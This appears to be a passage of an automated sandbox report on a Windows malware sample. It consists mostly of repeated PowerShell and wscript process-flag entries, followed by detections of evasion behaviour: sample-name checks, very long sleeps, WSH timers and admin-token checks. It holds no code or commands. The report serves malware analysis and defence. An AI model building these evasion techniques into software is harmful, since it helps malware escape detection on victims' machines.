Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

.NET source code contains a sample name check

Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4706	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5071	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7489	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2171	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7521
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2048
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3659
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3368

Found evasive API chain checking for process token information

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3172	Thread sleep count: 4706 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3172	Thread sleep count: 5071 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2892	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5252	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6256	Thread sleep count: 7521 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6252	Thread sleep count: 2048 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6544	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6008	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2780	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6220	Thread sleep count: 3659 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6220	Thread sleep count: 3368 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3936	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1076	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5616	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00A2BA94
